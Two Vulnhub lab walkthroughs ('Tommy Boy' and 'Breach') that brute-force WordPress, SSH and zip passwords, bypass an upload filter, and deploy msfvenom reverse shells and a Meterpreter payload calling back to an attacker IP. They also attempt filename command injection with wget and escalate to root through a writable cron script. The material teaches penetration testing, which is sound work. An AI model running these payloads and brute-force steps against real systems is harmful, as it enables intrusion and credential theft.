Tommy Boy: 1

Huge thanks to Brian Johnson for this fun VM.

Vulnhub

As usual we start with an nmap scan.

Every time I see a website I run dirb and nikto against it, but the first thing I check is robots.txt.

From robots.txt we can see a disallowed entry:

/flag-numero-uno.txt

Browsing to the URL http://192.168.0.102/flag-numero-uno.txt gives:

This is the first of five flags in the Callhan Auto server. You'll need them all to unlock
the final treasure and fully consider the VM pwned!

Flag data: B34rcl4ws

Checking the webpage

Checking the source code of the page reveals an interesting YouTube video.

Watching the YouTube video reveals the words "prehistoric forest".

We can try to fetch http://192.168.0.102/prehistoricforest/
This is a WordPress site!

From enumerating the site manually we can see there is a password-protected post, with a comment asking Richard for the password he set on it:

Richard, what’s the password you put on that protected blog post?

Also, since it is WordPress, let's check whether there are any known vulnerabilities.

So we run wpscan against it.

From the enumeration we can see some users, and we can try to brute-force their passwords.

wpscan -u 192.168.0.102/prehistoricforest/ --enumerate u

[+] Identified the following 4 user/s:
+----+----------+-------------------+
| Id | Login    | Name              |
+----+----------+-------------------+
| 1  | richard  | richard           |
| 2  | tom      | Big Tom           |
| 3  | tommy    | Tom Jr.           |
| 4  | michelle | Michelle Michelle |
+----+----------+-------------------+

wpscan -u 192.168.0.102/prehistoricforest/ --username tom --wordlist /usr/share/wordlists/rockyou.txt

Brute-forcing the user tom gives the password tomtom1.

On the WordPress site there is Flag #2, thisisthesecondflagyayyou.txt:

curl http://192.168.0.102/prehistoricforest/thisisthesecondflagyayyou.txt
You've got 2 of five flags - keep it up!

Flag data: Z4l1nsky

 

From enumerating WordPress further we can see that Tom left a message trying to remember his password, which gives us the second half of his SSH password ("1938!!").

Because we know the fixed tail of the password but not the characters in front of it, I generated the candidate list with crunch instead of writing it by hand; the mask below pins the known suffix and brute-forces three lowercase letters ahead of it, and hydra then feeds the list to SSH:

crunch 9 9 -t '@@@1938!!' -o tommy.txt
hydra -l tom -P tommy.txt 192.168.0.102 ssh -V

While hydra was brute-forcing tom's SSH password, I kept enumerating WordPress.

There was a reference to a richard directory on the website, which contained a picture of Richard:

http://192.168.0.102/prehistoricforest/richard/

Running exiftool on shockedrichard revealed a hash in the image's EXIF metadata:

User Comment : ce154b5a8e59c89732bc25d6a2e6b90b

A 32-character hex string is most likely an MD5 digest, and a quick Google search for it shows it is the MD5 of spanky.
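An offline equivalent of that lookup, as an added example that is not part of the original writeup: it guesses the digest type from the length of the hex string and checks it against a wordlist with hashlib. The sample wordlist is constructed for the example; a real run would stream rockyou.txt line by line. A length match is only a hint (NTLM hashes are also 32 hex characters), which is why the type is reported separately from the crack result.

```python
import hashlib

# Hex length -> hashlib algorithm name. 32 hex characters points at MD5
# (NTLM has the same length, so treat this as a guess, not a proof).
HASH_BY_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

# Constructed sample wordlist for the example; replace with a file such as
# /usr/share/wordlists/rockyou.txt in practice.
SAMPLE_WORDLIST = ["password", "richard", "callahan", "spanky", "holyschnikes"]


def identify_hash(digest):
    """Return the hashlib name suggested by the digest's hex length, or None."""
    digest = digest.strip().lower()
    if len(digest) in HASH_BY_LENGTH and all(c in "0123456789abcdef" for c in digest):
        return HASH_BY_LENGTH[len(digest)]
    return None


def hexdigest(algo, word):
    """Hex digest of word under the named hashlib algorithm."""
    return hashlib.new(algo, word.encode("utf-8")).hexdigest()


def crack(digest, wordlist):
    """Return the first wordlist entry whose digest matches, or None."""
    algo = identify_hash(digest)
    if algo is None:
        raise ValueError("unrecognised digest format: %r" % digest)
    target = digest.strip().lower()
    for word in wordlist:
        word = word.rstrip("\r\n")  # wordlist files carry line endings
        if hexdigest(algo, word) == target:
            return word
    return None


if __name__ == "__main__":
    found = "ce154b5a8e59c89732bc25d6a2e6b90b"  # the User Comment from shockedrichard
    print(identify_hash(found), crack(found, SAMPLE_WORDLIST))
```

Because the wordlist is iterated lazily, `crack(found, open("rockyou.txt", errors="ignore"))` works unchanged on the real file.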

There was a WordPress post that needed a password to be seen. Trying spanky unlocked it and the following content became readable:

Michelle/Tommy,

This is f'd up. I am currently working to restore the company's online ordering system, but we are having some problems getting it restored from backup. Unfortunately, only Big Tom had the passwords to log into the system. I can't find his passwords anywhere. All I can find so far is a note from our IT guy Nick (whose last day was yesterday) saying:

Hey Richy,

So you asked me to do a write-up of everything I know about the Callahan server so the next moron who is hired to support you idiots can get up to speed faster. Here's everything I know:

You guys are all hopeless sheep :-/ The Callahan Auto Web site is usually pretty stable. But if for some reason the page is ever down, you guys will probably go out of business. But, thanks to *me* there’s a backup called callahanbak.bak that you can just rename to index.html and everything will be good again. IMPORTANT: You have to do this under Big Tom’s account via SSH to perform this restore. Warning: Big Tom always forgets his account password. Warning #2: I screwed up his system account when I created it on the server, so it’s not called what it should be called. Eh, I can’t remember (don’t care) but just look at the list of users on the system and you’ll figure it out.

I left a few other bits of information in my home folder, which the new guy can access via FTP. Oh, except I should mention that the FTP server is super flaky and I haven’t had the time (i.e. I don’t give a fat crap) to fix it. Basically I couldn’t get it running on the standard port, so I put it on a port that most scanners would get exhausted looking for. And to make matters more fun, the server seems to go online at the top of the hour for 15 minutes, then down for 15 minutes, then up again, then down again. Now it’s somebody else’s problem (did I mention I don’t give a rat’s behind?).

You asked me to leave you with my account password for the server, and instead of laughing in your face (which is what I WANTED to do), I just reset my account (“nickburns” in case you’re dumb and can’t remember) to a very, VERY easy to guess password. I removed my SSH access because I *DON’T* want you calling me in case of an emergency. But my creds still work on FTP. Your new fresh fish can connect using my credentials and if he/she has half a brain.

Good luck, schmucks!

LOL

-Nick

 

Michelle/Tommy…WTF are we going to do?!?! If this site stays down, WE GO OUT OF BUSINESS!!!1!!1!!!!!!!

-Richard

From the earlier nmap scan we know there is a web server on port 8008; it is Nick's.

We can now fetch http://192.168.0.102:8008/NickIzL33t/

This page shows nothing but a hint: "Only me and Steve Jobs can see this content".

So I changed my User-Agent header to something Apple-related (I used a Firefox add-on for convenience, but I first tested the user agent with Burp Suite):

Apple-iPhone/501.347

With this User-Agent I got the NickIzL33t page, which only told me I would need to know the name of a page ending in .html.

So I fired up dirbuster to brute-force the .html name, but it kept crashing with the rockyou.txt wordlist.
So I used Burp Suite Intruder to brute-force the name instead, and found that the hidden page is fallon1.html.
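The same brute force as a small script, added here as an example and not part of the original writeup: it sends the Apple User-Agent with every request and tries each wordlist entry with .html appended, keeping the names that do not come back 404. The host, wordlist and status codes treated as hits are assumptions; the HTTP call is passed in as a function so the logic can be exercised offline with a fake server.

```python
import urllib.error
import urllib.parse
import urllib.request

IPHONE_UA = "Apple-iPhone/501.347"  # the user agent that satisfied the "Steve Jobs" check


def http_status(url, user_agent, timeout=5):
    """Return the HTTP status for url, sending the given User-Agent.
    4xx/5xx responses are returned as their status instead of raising."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def find_pages(base_url, words, user_agent=IPHONE_UA, ext=".html",
               fetch=http_status, hits=(200, 301, 302, 403)):
    """Request base_url/<word><ext> for every word and return the names that exist.
    `fetch` is called as fetch(url, user_agent) so a fake can replace the network."""
    found = []
    seen = set()
    for word in words:
        word = word.strip()
        if not word or word in seen:  # skip blanks and wordlist duplicates
            continue
        seen.add(word)
        url = base_url.rstrip("/") + "/" + urllib.parse.quote(word) + ext
        if fetch(url, user_agent) in hits:
            found.append(word + ext)
    return found


if __name__ == "__main__":
    # Assumed target and wordlist path; rockyou.txt contains non-UTF-8 lines,
    # hence errors="ignore".
    with open("/usr/share/wordlists/rockyou.txt", errors="ignore") as wordlist:
        print(find_pages("http://192.168.0.102:8008/NickIzL33t", wordlist))
```

Dropping the User-Agent argument back to a default browser string is a quick way to confirm that the gate really is the header and not the path.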

From fallon1.html we can download the hint for cracking the zip file, the zip file itself and the 3rd flag!

http://192.168.0.102:8008/NickIzL33t/flagtres.txt

THREE OF 5 FLAGS - you're awesome sauce.

Flag data: TinyHead

Checking the source of that page, we can see a link to an image upload form:

http://192.168.0.102:8008/NickIzL33t/P4TCH_4D4MS/upload.php

If we just rename our PHP file to .gif, the upload accepts it and we get code execution on the server :)

For cracking the zip file found earlier, the hint describes the password format, so we build a wordlist that fits it with crunch:

crunch 13 13 -t bev,%%@@^1995 -o tomwlist.txt

This creates every 13-character string matching the mask: the literal prefix bev, one uppercase letter, two digits, two lowercase letters, one symbol and the literal suffix 1995. Then we feed it to fcrackzip:

fcrackzip -D -p ./Nick/tomwlist.txt -u t0msp4ssw0rdz.zip -v
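Both crunch masks above (@@@1938!! for Tom's SSH password and bev,%%@@^1995 for the zip) work the same way, so here is the mask expansion written out once as an added example, not code from the original writeup. It implements crunch's -t placeholders (@ lowercase, , uppercase, % digit, ^ symbol; anything else is a literal) and streams the candidates to a file. The symbol set is an assumption for the example; crunch ships its own default, so pass the real one through `charsets` if the count must match exactly.

```python
import itertools
import string

# Placeholder classes as crunch's -t option defines them. The "^" symbol set is
# an assumption for this example; crunch's default list is larger.
DEFAULT_CHARSETS = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=",
}


def parse_mask(mask, charsets=DEFAULT_CHARSETS):
    """Turn a crunch-style mask into one alphabet per position.
    Characters outside charsets are literals (that is how 1938!! and bev are pinned);
    a backslash escapes a placeholder character so it is taken literally."""
    positions = []
    i = 0
    while i < len(mask):
        c = mask[i]
        if c == "\\" and i + 1 < len(mask):
            positions.append(mask[i + 1])
            i += 2
            continue
        positions.append(charsets.get(c, c))
        i += 1
    return positions


def mask_size(mask, charsets=DEFAULT_CHARSETS):
    """Number of candidates the mask expands to (useful before starting hydra)."""
    size = 1
    for alphabet in parse_mask(mask, charsets):
        size *= len(alphabet)
    return size


def expand_mask(mask, charsets=DEFAULT_CHARSETS):
    """Yield every candidate; the rightmost variable position changes fastest."""
    for combo in itertools.product(*parse_mask(mask, charsets)):
        yield "".join(combo)


def write_wordlist(mask, path, charsets=DEFAULT_CHARSETS):
    """Stream the candidates to path, one per line, and return how many were written."""
    count = 0
    with open(path, "w") as fh:
        for candidate in expand_mask(mask, charsets):
            fh.write(candidate + "\n")
            count += 1
    return count


if __name__ == "__main__":
    for mask in ("@@@1938!!", "bev,%%@@^1995"):
        print(mask, mask_size(mask), "candidates, first:", next(expand_mask(mask)))
```

Checking `mask_size` first is the point of the exercise: 26^3 = 17576 candidates for the SSH mask is fine to throw at hydra, while the zip mask is a few orders of magnitude larger and only practical because fcrackzip runs offline.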

unzipping the zip gives us a file passwords.txt containing

Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ???
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

Since we already know the second part of the password, "1938!!" (from the WordPress post), the full password is fatguyinalittlecoat1938!!

So we can log in with the user bigtommysenior:

ssh bigtommysenior@192.168.0.102 (password = fatguyinalittlecoat1938!!)

Once logged in over SSH:

cat el-flag-numero-quatro.txt
YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal
working status.

Flag data: EditButton

But...but...where's flag 5?

I'll make it easy on you. It's in the root of this server at /5.txt

I quickly checked whether my user could read it, but the file is owned by www-data (and is actually a dotfile, .5.txt). Since I had already uploaded a malicious PHP file through the image upload bypass, I already had a shell as www-data and could read it from there :)

 

cat .5.txt
FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!!
OH RICHARD DON'T RUN AWAY FROM YOUR FEELINGS!!!!!!!!

Flag data: Buttcrack

Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk.
So for example, if flag 1 data was "hi" and flag 2 data was "there" and flag 3 data was "you"
you would create this blob:

hithereyou

Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom's
folder and you can call the box PWNED.

So we just need to concatenate all flags 🙂

1st Flag : B34rcl4ws # From robots.txt
2nd Flag : Z4l1nsky # From WordPress
3rd Flag : TinyHead # From Nick’s web service
4th Flag : EditButton #From SSH
5th Flag : Buttcrack #From Getting a shell as www-data

So the Password for the LOOT.zip should be

B34rcl4wsZ4l1nskyTinyHeadEditButtonButtcrack

unzip LOOT.ZIP
Archive: LOOT.ZIP
[LOOT.ZIP] THE-END.txt password:
inflating: THE-END.txt
bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt
YOU CAME.
YOU SAW.
YOU PWNED.

Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year.

GREAT WORK!

I'd love to know that you finished this VM, and/or get your suggestions on how to make the next
one better.

Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!"

Or, get in touch with me other ways:

* Twitter: @7MinSec
* IRC (Freenode): #vulnhub (username is braimee)

Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at
bit.ly/7minsec

Thanks and have a blessed week!

-Brian Johnson
7 Minute Security

Fun VM.

What I learned:
1. Some new dirbuster options for brute-forcing only .html names and for setting a User-Agent.
2. How to use crunch efficiently to generate a custom wordlist that fits a known password format.
3. How to use Burp Suite as a brute-forcer that you completely control.

Thank you for reading this!


Breach

First we start with an nmap scan, but it took far too long to enumerate the host, so I browsed to the IP, found a website there and started nikto and dirb.

While checking the source code of the web application I found a strange string that looked like base64. Decoding it gives a username and password that log in to the ImpressCMS instance:

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh
pgibbons:damnitfeel$goodtobeagang$ta

#TODO Where is the pcap located on the website
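Finding that string by eye is the slow way; the script below is an added example (not part of the original writeup) that scans page source for base64-looking tokens, decodes the ones that yield printable text, and reports any that have the user:password shape. The HTML fragment is constructed for the example and only reuses the string the writeup reports.

```python
import base64
import binascii
import re
import string

# A base64 token: 16 or more alphabet characters plus optional padding, not glued
# to other base64 characters (so it is not a fragment of a longer run).
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")
PRINTABLE = set(string.printable) - set("\x0b\x0c")

# Constructed page fragment for the example; not the real Breach source.
SAMPLE_HTML = """<html><body>
<!-- Y2hlY2sgdGhlIHBjYXA= -->
<!-- cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh -->
<script src="/js/jquery.min.js?ver=1.11.3"></script>
</body></html>"""


def decode_if_text(token):
    """Return the decoded string if token is valid base64 of printable text, else None."""
    padded = token + "=" * (-len(token) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch in PRINTABLE for ch in text):
        return text
    return None


def find_base64_strings(source):
    """Yield (token, decoded) for every token in source that decodes to readable text."""
    for match in B64_TOKEN.finditer(source):
        decoded = decode_if_text(match.group(1))
        if decoded is not None:
            yield match.group(1), decoded


def find_credentials(source):
    """Return (user, password) pairs from decoded strings shaped like user:password."""
    creds = []
    for _, decoded in find_base64_strings(source):
        user, sep, password = decoded.partition(":")
        if sep and user and password and " " not in user:
            creds.append((user, password))
    return creds


if __name__ == "__main__":
    for token, decoded in find_base64_strings(SAMPLE_HTML):
        print(token, "->", decoded)
    print(find_credentials(SAMPLE_HTML))
```

Run it over `curl -s` output of every page dirb found; the printable-text filter throws away the many base64 runs (inline images, nonces) that decode to binary.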

When I found the keystore I downloaded a tool to brute-force its password, because I needed the private key in a different format to be able to import it into Wireshark and decrypt the pcap:

https://github.com/bes/KeystoreBrute

While that was running I tried to be smart about it and ran strings on the keystore file, which revealed the word "tomcat"; I tried it as the password and it worked!

With the password tomcat, convert the JKS keystore to PKCS#12 and extract the unencrypted RSA private key (keystore below is the file downloaded from the site):

keytool -importkeystore -srckeystore keystore -srcstoretype JKS -destkeystore keystore.p12 -deststoretype PKCS12
openssl pkcs12 -in keystore.p12 -nocerts -out privatekey.pem
openssl rsa -in privatekey.pem -out keyout.pem

Adding keyout.pem to Wireshark's RSA key list decrypts the TLS traffic in the pcap. This only works because the captured session used an RSA key exchange; with (EC)DHE cipher suites the server's private key does not recover the session keys and you would need the session secrets instead. The decrypted capture contains:

Authorization Basic
tomcat:Tt\5D8F(#!*u=G)4m7zB

After searching a long time for how to connect to the Tomcat service (Firefox did not work, and neither did netcat), I found out you can at least reach it with openssl:

openssl s_client -connect 192.168.110.140:8443
After hours of debugging with openssl I decided to try a browser other than Firefox, and I was able to reach the Tomcat server with Edge!

We can login with the credentials found in the pcap

Because we are an admin of Tomcat, we can deploy a malicious WAR file through the manager:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.110 LPORT=443 -f war -o /root/Dropbox/Vulnhub/Breach/shell.war
jar -xvf shell.war # to see the name of the JSP to call

inflated: zhawsspalj.jsp
nc -lvp 443
https://192.168.110.140:8443/shell/zhawsspalj.jsp

To upgrade the shell later, I also generated a Meterpreter ELF:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.110.110 LPORT=443 -f elf -o breachmeter.elf

While enumerating the system I found there is no root password for MySQL, so I dumped all the databases and found the MD5 hash of the user milton.

Submitting this hash to CrackStation revealed the password is thelaststraw.

Checking the logs on this server revealed a root cron job:
Jul 5 06:39:01 Breach CRON[2985]: (root) CMD (/usr/share/cleanup/tidyup.sh)

Since I controlled the names of the files the script deletes, I tried to inject shell commands through a filename. I did find a way to stop the script from deleting my file, because it does not handle spaces in names. I then tried a filename like a&&wget 192.168.110.110, hoping the command passed to the shell would become
rm -rf swingline/a&&wget 192.168.110.110 and execute the wget.

I banged my head for about two days trying to exploit it this way. I found something useful online about passing arguments without spaces:
{ls,-larth}
Even this did not work. The reason is that a filename expanded from a variable or a glob only goes through word splitting: the shell never re-parses operators such as && or ; out of an expanded value, and brace expansion happens before parameter and pathname expansion, so neither trick reaches the command line unless the script itself builds a string and hands it to eval or sh -c. So I did what I had learned best while doing my OSCP: Try Harder! (If you are stuck somewhere, restart your enumeration from scratch.)
While restarting my enumeration I came across a comment in one of the website's images while running exiftool on it.

It had the comment "coffeestains".

From my earlier enumeration I knew there was another user on the system who did not seem to interact with it (no trace of him in the logs and nothing in his home directory): blumbergh. I had already tried some basic passwords on the account, but this time I tried the new information.

su blumbergh // coffeestains

I was in!

Since I thought he was the server administrator (he would not need to write anything in his home directory if he could become root), I checked his sudo rights:

sudo -l
User blumbergh may run the following commands on Breach:
(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

Okay, we do not have full sudo privileges, but we can overwrite tidyup.sh, which root runs from cron! Write a replacement script that runs our breachmeter.elf into /tmp/tidyup.sh, then copy it over the original with tee:

cat /tmp/tidyup.sh | sudo tee /usr/share/cleanup/tidyup.sh

From now on we just wait for the cron job to fire and connect back to our Metasploit handler:

use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp

we then get a shell as root! Finally 🙂

root@Breach:/root# cat .flag.txt
cat .flag.txt
-----------------------------------------------------------------------------------

 ______ _ __ _____ _____ _ _____ _
| ___ \ | | / | | _ | |_ _| | | ___| | |
| |_/ /_ __ ___ __ _ ___| |__ `| | | |/' |______| | | |__ ___| |__ _ __ __| |
| ___ \ '__/ _ \/ _` |/ __| '_ \ | | | /| |______| | | '_ \ / _ \ __| '_ \ / _` |
| |_/ / | | __/ (_| | (__| | | || |_\ |_/ / | | | | | | __/ |__| | | | (_| |
\____/|_| \___|\__,_|\___|_| |_\___(_)___/ \_/ |_| |_|\___\____/_| |_|\__,_|

-----------------------------------------------------------------------------------
Congrats on reaching the end and thanks for trying out my first #vulnhub boot2root!

Shout-out to knightmare, and rastamouse for testing and g0tmi1k for hosting.